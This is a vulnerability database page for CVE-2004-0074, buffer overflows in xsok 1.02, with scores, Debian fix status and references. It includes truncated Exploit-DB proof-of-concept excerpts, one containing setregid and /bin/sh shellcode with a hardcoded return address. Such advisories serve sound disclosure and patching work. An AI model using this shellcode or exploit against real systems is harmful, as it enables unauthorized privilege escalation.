CVE-2004-0074
published 2004-02-17CVE-2004-0074: Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via (1) a long LANG environment variable, or (2) a long -xsokdir command line…
PriorityP415medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
0.99%
58.2th percentile
Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via (1) a long LANG environment variable, or (2) a long -xsokdir command line argument, a different vulnerability than CVE-2003-0949.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | xsok | — | — |
| michael_bischoff | xsok | — | — |
CVSS provenance
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
vendor_debian4.6LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jggx-7jmp-p9ff: Multiple buffer overflows in xsok 1
ghsa_unreviewed·2022-04-29·CVSS 4.6
CVE-2004-0074 [MEDIUM] GHSA-jggx-7jmp-p9ff: Multiple buffer overflows in xsok 1
Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via (1) a long LANG environment variable, or (2) a long -xsokdir command line argument, a different vulnerability than CVE-2003-0949.
Debian
CVE-2004-0074: xsok - Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via...
vendor_debian·2004·CVSS 4.6
CVE-2004-0074 [MEDIUM] CVE-2004-0074: xsok - Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via...
Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via (1) a long LANG environment variable, or (2) a long -xsokdir command line argument, a different vulnerability than CVE-2003-0949.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
exploitdb·2004-01-02
CVE-2004-0074 XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
---
/* 0x333xsok (2) => xsok 1.02 local game exploit
*
* Happy new year ! (2 :)
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include
#include
#define BIN "/usr/games/xsok"
#define RETADD 0xbffffa3c
#define SIZE 200
unsigned char shellcode[] =
/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"
/* exec /bin/sh shellcode */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
int main (int argc, char ** argv)
{
int i, ret = RETADD;
char out[SIZE];
fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n");
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
int *xsok = (int *)(o
Exploit-DB
XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun
exploitdb·2003-12-30
CVE-2004-0074 XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun
XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun
---
// source: https://www.securityfocus.com/bid/9341/info
xsok is prone to a locally exploitable buffer overrun vulnerability due to insufficient bounds check of data supplied through the LANG environment variable. This could be exploited to execute arbitrary code with elevated privileges. The program is typically installed setgid games.
/*
xsok 1.02 local game exploit
coded by n2n, n2nlinuxmail.org
Eye on Security Research Group, India http://www.eos-india.net
This exploit calculates the return address automatically.
Also the shellcode is improved and automatically gets the effective uid and gid of the vulnerable binary.
Tested on Redhat Linux 9.0
*/
#define VULN "/usr/X11R6/bin/xsok"
#define BUFLEN 100
#include
#include
#include
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107307407027259&w=2http://marc.info/?l=bugtraq&m=107332542918529&w=2http://www.securityfocus.com/bid/9341http://www.securityfocus.com/bid/9352https://exchange.xforce.ibmcloud.com/vulnerabilities/14906https://exchange.xforce.ibmcloud.com/vulnerabilities/14910http://marc.info/?l=bugtraq&m=107307407027259&w=2http://marc.info/?l=bugtraq&m=107332542918529&w=2http://www.securityfocus.com/bid/9341http://www.securityfocus.com/bid/9352https://exchange.xforce.ibmcloud.com/vulnerabilities/14906https://exchange.xforce.ibmcloud.com/vulnerabilities/14910
2004-02-17
Published